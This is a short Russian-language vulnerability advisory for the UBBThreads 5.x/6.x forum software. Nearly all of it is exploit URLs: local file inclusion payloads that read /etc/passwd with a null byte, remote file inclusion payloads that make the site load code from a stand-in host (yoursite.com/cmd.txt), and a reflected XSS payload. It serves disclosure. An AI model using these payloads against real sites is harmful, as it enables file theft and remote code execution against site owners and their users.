Программа: UBBThreads 5.x,6.x

Удаленный пользователь может прочитать произвольные файлы на системе и выполнить произвольный Java-код в контексте уязвимого сайта.

Пример:

Версия 6.х

http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00
http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?
http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00

Если php версии < 4.1.0 или UBB версии <= 5.x

http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?
http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00

XSS:

http://[site]/[ubbpath]/index.php?debug=<script>alert();</script>
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии